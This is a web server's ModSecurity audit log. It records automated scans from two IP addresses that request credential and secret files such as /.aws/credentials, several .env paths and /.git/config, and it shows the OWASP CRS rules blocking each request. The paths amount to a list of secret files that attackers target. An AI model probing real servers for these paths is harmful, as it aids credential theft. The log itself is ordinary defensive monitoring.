[Sat Oct 04 03:54:25.094567 2025] [:error] [pid 3217773] [client 52.55.215.246:51462] [client 52.55.215.246] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aOB-URRnn7xrNGxYbuY-mQAAAAM"]
[Sat Oct 04 03:54:25.094778 2025] [:error] [pid 3217773] [client 52.55.215.246:51462] [client 52.55.215.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aOB-URRnn7xrNGxYbuY-mQAAAAM"]
[Sat Oct 04 03:54:25.094952 2025] [:error] [pid 3217773] [client 52.55.215.246:51462] [client 52.55.215.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aOB-URRnn7xrNGxYbuY-mQAAAAM"]
[Sat Oct 04 03:54:25.221138 2025] [:error] [pid 3217773] [client 52.55.215.246:51462] [client 52.55.215.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /myproject/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/myproject/.env"] [unique_id "aOB-URRnn7xrNGxYbuY-mgAAAAM"]
[Sat Oct 04 03:54:25.221341 2025] [:error] [pid 3217773] [client 52.55.215.246:51462] [client 52.55.215.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/myproject/.env"] [unique_id "aOB-URRnn7xrNGxYbuY-mgAAAAM"]
[Sat Oct 04 03:54:25.221508 2025] [:error] [pid 3217773] [client 52.55.215.246:51462] [client 52.55.215.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/myproject/.env"] [unique_id "aOB-URRnn7xrNGxYbuY-mgAAAAM"]
[Sat Oct 04 03:54:25.343373 2025] [:error] [pid 3217773] [client 52.55.215.246:51462] [client 52.55.215.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.envs/.production/.django"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.envs/.production/.django"] [unique_id "aOB-URRnn7xrNGxYbuY-mwAAAAM"]
[Sat Oct 04 03:54:25.343586 2025] [:error] [pid 3217773] [client 52.55.215.246:51462] [client 52.55.215.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.envs/.production/.django"] [unique_id "aOB-URRnn7xrNGxYbuY-mwAAAAM"]
[Sat Oct 04 03:54:25.343804 2025] [:error] [pid 3217773] [client 52.55.215.246:51462] [client 52.55.215.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.envs/.production/.django"] [unique_id "aOB-URRnn7xrNGxYbuY-mwAAAAM"]
[Sat Oct 04 03:54:25.461103 2025] [:error] [pid 3217773] [client 52.55.215.246:51462] [client 52.55.215.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /react-app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/react-app/.env"] [unique_id "aOB-URRnn7xrNGxYbuY-nAAAAAM"]
[Sat Oct 04 03:54:25.461319 2025] [:error] [pid 3217773] [client 52.55.215.246:51462] [client 52.55.215.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/react-app/.env"] [unique_id "aOB-URRnn7xrNGxYbuY-nAAAAAM"]
[Sat Oct 04 03:54:25.461504 2025] [:error] [pid 3217773] [client 52.55.215.246:51462] [client 52.55.215.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/react-app/.env"] [unique_id "aOB-URRnn7xrNGxYbuY-nAAAAAM"]
[Sat Oct 04 03:54:25.570501 2025] [:error] [pid 3217773] [client 52.55.215.246:51462] [client 52.55.215.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /react-app/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/react-app/.env.production"] [unique_id "aOB-URRnn7xrNGxYbuY-nQAAAAM"]
[Sat Oct 04 03:54:25.570713 2025] [:error] [pid 3217773] [client 52.55.215.246:51462] [client 52.55.215.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/react-app/.env.production"] [unique_id "aOB-URRnn7xrNGxYbuY-nQAAAAM"]
[Sat Oct 04 03:54:25.570875 2025] [:error] [pid 3217773] [client 52.55.215.246:51462] [client 52.55.215.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/react-app/.env.production"] [unique_id "aOB-URRnn7xrNGxYbuY-nQAAAAM"]
[Sat Oct 04 03:54:25.690124 2025] [:error] [pid 3217773] [client 52.55.215.246:51462] [client 52.55.215.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aOB-URRnn7xrNGxYbuY-ngAAAAM"]
[Sat Oct 04 03:54:25.690334 2025] [:error] [pid 3217773] [client 52.55.215.246:51462] [client 52.55.215.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aOB-URRnn7xrNGxYbuY-ngAAAAM"]
[Sat Oct 04 03:54:25.690556 2025] [:error] [pid 3217773] [client 52.55.215.246:51462] [client 52.55.215.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aOB-URRnn7xrNGxYbuY-ngAAAAM"]
[Sat Oct 04 03:54:27.714505 2025] [:error] [pid 3217773] [client 52.55.215.246:51462] [client 52.55.215.246] ModSecurity: Warning. Matched phrase ".aws/config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/config found within REQUEST_FILENAME: /.aws/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aOB-UxRnn7xrNGxYbuY-oQAAAAM"]
[Sat Oct 04 03:54:27.714715 2025] [:error] [pid 3217773] [client 52.55.215.246:51462] [client 52.55.215.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aOB-UxRnn7xrNGxYbuY-oQAAAAM"]
[Sat Oct 04 03:54:27.714893 2025] [:error] [pid 3217773] [client 52.55.215.246:51462] [client 52.55.215.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aOB-UxRnn7xrNGxYbuY-oQAAAAM"]
[Sat Oct 04 03:54:29.200934 2025] [:error] [pid 3217773] [client 52.55.215.246:51462] [client 52.55.215.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.aws"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.aws"] [unique_id "aOB-VRRnn7xrNGxYbuY-owAAAAM"]
[Sat Oct 04 03:54:29.201137 2025] [:error] [pid 3217773] [client 52.55.215.246:51462] [client 52.55.215.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.aws"] [unique_id "aOB-VRRnn7xrNGxYbuY-owAAAAM"]
[Sat Oct 04 03:54:29.201302 2025] [:error] [pid 3217773] [client 52.55.215.246:51462] [client 52.55.215.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.aws"] [unique_id "aOB-VRRnn7xrNGxYbuY-owAAAAM"]
[Sat Oct 04 08:11:02.748140 2025] [:error] [pid 3220272] [client 93.123.109.60:58770] [client 93.123.109.60] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aOC6dmorriO7nnIrUApS5gAAAA4"]
[Sat Oct 04 08:11:02.749135 2025] [:error] [pid 3220272] [client 93.123.109.60:58770] [client 93.123.109.60] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aOC6dmorriO7nnIrUApS5gAAAA4"]
[Sat Oct 04 08:11:02.749326 2025] [:error] [pid 3220272] [client 93.123.109.60:58770] [client 93.123.109.60] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aOC6dmorriO7nnIrUApS5gAAAA4"]
[Sat Oct 04 08:11:02.896891 2025] [:error] [pid 3220272] [client 93.123.109.60:58770] [client 93.123.109.60] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aOC6dmorriO7nnIrUApS5wAAAA4"]
[Sat Oct 04 08:11:02.897928 2025] [:error] [pid 3220272] [client 93.123.109.60:58770] [client 93.123.109.60] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aOC6dmorriO7nnIrUApS5wAAAA4"]
[Sat Oct 04 08:11:02.898118 2025] [:error] [pid 3220272] [client 93.123.109.60:58770] [client 93.123.109.60] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aOC6dmorriO7nnIrUApS5wAAAA4"]
[Sat Oct 04 08:11:03.039546 2025] [:error] [pid 3220272] [client 93.123.109.60:58770] [client 93.123.109.60] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aOC6d2orriO7nnIrUApS6AAAAA4"]
[Sat Oct 04 08:11:03.040508 2025] [:error] [pid 3220272] [client 93.123.109.60:58770] [client 93.123.109.60] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aOC6d2orriO7nnIrUApS6AAAAA4"]
[Sat Oct 04 08:11:03.040708 2025] [:error] [pid 3220272] [client 93.123.109.60:58770] [client 93.123.109.60] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aOC6d2orriO7nnIrUApS6AAAAA4"]
[Sat Oct 04 08:11:03.205940 2025] [:error] [pid 3220272] [client 93.123.109.60:58770] [client 93.123.109.60] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aOC6d2orriO7nnIrUApS6QAAAA4"]
[Sat Oct 04 08:11:03.206941 2025] [:error] [pid 3220272] [client 93.123.109.60:58770] [client 93.123.109.60] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aOC6d2orriO7nnIrUApS6QAAAA4"]
[Sat Oct 04 08:11:03.207126 2025] [:error] [pid 3220272] [client 93.123.109.60:58770] [client 93.123.109.60] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aOC6d2orriO7nnIrUApS6QAAAA4"]
[Sat Oct 04 08:11:03.301637 2025] [:error] [pid 3220272] [client 93.123.109.60:58770] [client 93.123.109.60] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aOC6d2orriO7nnIrUApS6gAAAA4"]
[Sat Oct 04 08:11:03.302645 2025] [:error] [pid 3220272] [client 93.123.109.60:58770] [client 93.123.109.60] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aOC6d2orriO7nnIrUApS6gAAAA4"]
[Sat Oct 04 08:11:03.302843 2025] [:error] [pid 3220272] [client 93.123.109.60:58770] [client 93.123.109.60] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aOC6d2orriO7nnIrUApS6gAAAA4"]
[Sat Oct 04 08:11:03.426191 2025] [:error] [pid 3220272] [client 93.123.109.60:58770] [client 93.123.109.60] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag 